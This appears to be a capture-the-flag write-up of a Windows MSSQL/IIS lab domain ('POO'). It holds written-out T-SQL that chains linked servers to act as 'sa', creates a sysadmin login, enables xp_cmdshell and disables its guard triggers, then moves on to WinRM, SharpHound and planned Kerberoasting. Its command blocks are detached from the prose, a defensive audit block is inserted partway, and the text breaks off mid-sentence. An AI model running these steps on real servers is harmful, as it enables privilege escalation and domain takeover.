80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-19T12:27:43+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
From the scan we can see:
an HTTP server, Microsoft IIS httpd 10.0
the domain name intranet.poo, which we can add to our hosts file
MSSQL Server 2017
Let's check out the web server.
Looks like a default IIS server.
Let's run feroxbuster and see if we can discover anything.
Let's check for any vhosts.
Nothing interesting.
Let's run nikto to see if we can find any vulnerabilities.
We do see something interesting.
We can see the web server has a .DS_Store file within the server's root directory.
What is a .DS_Store file?
It is a hidden file that macOS creates automatically when a user opens a folder in the Finder application. The file records which files are in the folder, along with options such as how the icons look.
Why do we care?
Here is a great blog that explains this better than I can:
Essentially, we can use the "~" tilde to enumerate files and folders on the IIS server. The tilde reveals the first six characters of file and folder names along with their extension.
Let's see if we can authenticate to the MSSQL server.
First I want to see if I can run commands with xp_cmdshell.
No luck.
Let's conduct some basic enumeration:
MSSQL version
List the databases
Current database
Couldn't find anything too interesting.
We could create an MSSQL server link and point it at an external source.
Let's find our current server's name.
We can check for linked servers by querying the sysservers table.
We can see there is another linked remote server, POO_CONFIG.
We can use EXECUTE ... AT to run queries on other servers.
Example:
After enumerating further there wasn't anything too interesting.
Let's see if we can get POO_CONFIG to execute queries on POO_PUBLIC.
Notice how the command ran as the 'sa' user. From what I can tell this is most likely a configuration issue: the first link allows any user on POO_PUBLIC to run queries on POO_CONFIG as the internal user, but the second link looks like it allows any user from POO_CONFIG to run queries on POO_PUBLIC as the 'sa' user.
When we check our permissions through POO_CONFIG -> POO_PUBLIC,
we can see we have ALL the permissions.
Let's create a new 'sa' user with a password so we don't have to keep relying on server links.
Creating a user:
Giving our user the necessary permissions:
Let's log in via our newly created user.
We are now logged in as a system administrator.
Reading the flag:
Let's enable xp_cmdshell.
Note: when triggers are in place, they are essentially a policy put in place to alert on and block attempts at certain actions, such as enabling xp_cmdshell; these triggers reside in sys.server_triggers.
We can disable them by
Now that we have command execution, our next step will be to establish a reverse shell on the system.
Let's check out the web.config file.
Alright, I want to try and find a way to access this file.
Fun fact: when a server is enabled to run the stored procedure sp_execute_external_script, and it is configured to do so as a different user, we can use this particular procedure to run a simple Python script, so let's try that.
We can see this procedure is running under the user poo_public01.
Let's see if we can read the web.config file now.
And we now have the contents of the web.config file.
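As an added defensive check, not part of the original write-up, the following T-SQL audit ties together the three conditions used above: the linked-server login mapping that hands a remote 'sa' to every local login, the server triggers that guard xp_cmdshell, and the instance options (xp_cmdshell, external scripts) that turn a SQL login into OS code execution. It uses only standard SQL Server catalog views and assumes it is run as a sysadmin on the instance; the POO_* names in the comments are the ones from this box.

```sql
-- Added audit queries (not from the original write-up). Run as sysadmin.

-- 1. Linked servers and how local logins are mapped across them.
--    local_principal_id = 0 means the mapping applies to ALL local logins;
--    if remote_name is 'sa', every local login can run queries on the
--    remote side as sa (the POO_CONFIG -> POO_PUBLIC link seen above).
SELECT s.name                              AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       ISNULL(p.name, '<all logins>')      AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
  ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p
  ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
  AND (ll.local_principal_id = 0 OR ll.remote_name = 'sa');

-- 2. Server-level triggers (the guard rails mentioned in the text) and
--    whether any of them have been switched off.
SELECT name, is_disabled, modify_date
FROM sys.server_triggers;

-- 3. Instance options that expose OS command or script execution.
--    'external scripts enabled' is what sp_execute_external_script needs.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'external scripts enabled',
               'Ole Automation Procedures');

-- 4. Logins that hold sysadmin, newest first (the write-up adds one).
SELECT sp.name, sp.type_desc, sp.create_date
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G')
ORDER BY sp.create_date DESC;
```

Any row from query 1 with '<all logins>' mapped to 'sa', a disabled trigger in query 2, a value_in_use of 1 in query 3, or an unexpected recent login in query 4 is the finding to chase.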
Let's try these creds at the /admin login prompt we found earlier.
They work.
I don't see a way in, in terms of a foothold, within this page, so let's go back to our MSSQL client and enumerate the machine further.
We do find an IPv6 address.
Let's see what nmap can find on this address.
Results:
We can see WinRM is enabled, meaning we should be able to use evil-winrm and gain access to the machine.
We need to add the hostname and IP address to our hosts file:
COMPATIBILITY
Now we should be able to WinRM into the machine.
It worked.
Now we need to find a way of pivoting.
We can upload SharpHound.exe via WinRM, but when we try to execute the tool we encounter some problems: since Administrator is not a domain account, we can't query the domain. So we will run SharpHound.exe via our MSSQL client instead; since we have access to the service account shrek123, we can impersonate a computer account, which can query the domain.
Upload SharpHound.exe via WinRM:
Execute SharpHound.exe via mssqlclient:
Now we can download the output zip file onto our local machine and ingest it into BloodHound.
Looking through BloodHound, within the built-in query "Shortest Paths to Domain Admins from Kerberoastable Users",
we can see the user P00_ADM@INTRANET.POO is a member of the help desk and has GenericAll privileges on the Domain Admins group, meaning we can add any member to the Domain Admins group.
Let's perform some Kerberoasting on the user P00_ADM@INTRANET.POO.
We will utilize the Invoke-Kerberoast.ps1 script from
EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG]
EXECUTE ('EXECUTE (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
-------------------------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
EXECUTE('EXECUTE(''CREATE LOGIN shrek123 WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''shrek123'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
sudo nmap -A -6 -p- --min-rate 10000 dead:beef::1001
Host is up (0.30s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info:
| dead:beef::1001:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-19T03:16:01
|_Not valid after: 2054-01-19T03:16:01
|_ssl-date: 2024-01-20T02:31:26+00:00; +2s from scanner time.
| ms-sql-info:
| dead:beef::1001:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
TRACEROUTE
HOP RTT ADDRESS
1 297.48 ms dead:beef::1001
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.85 seconds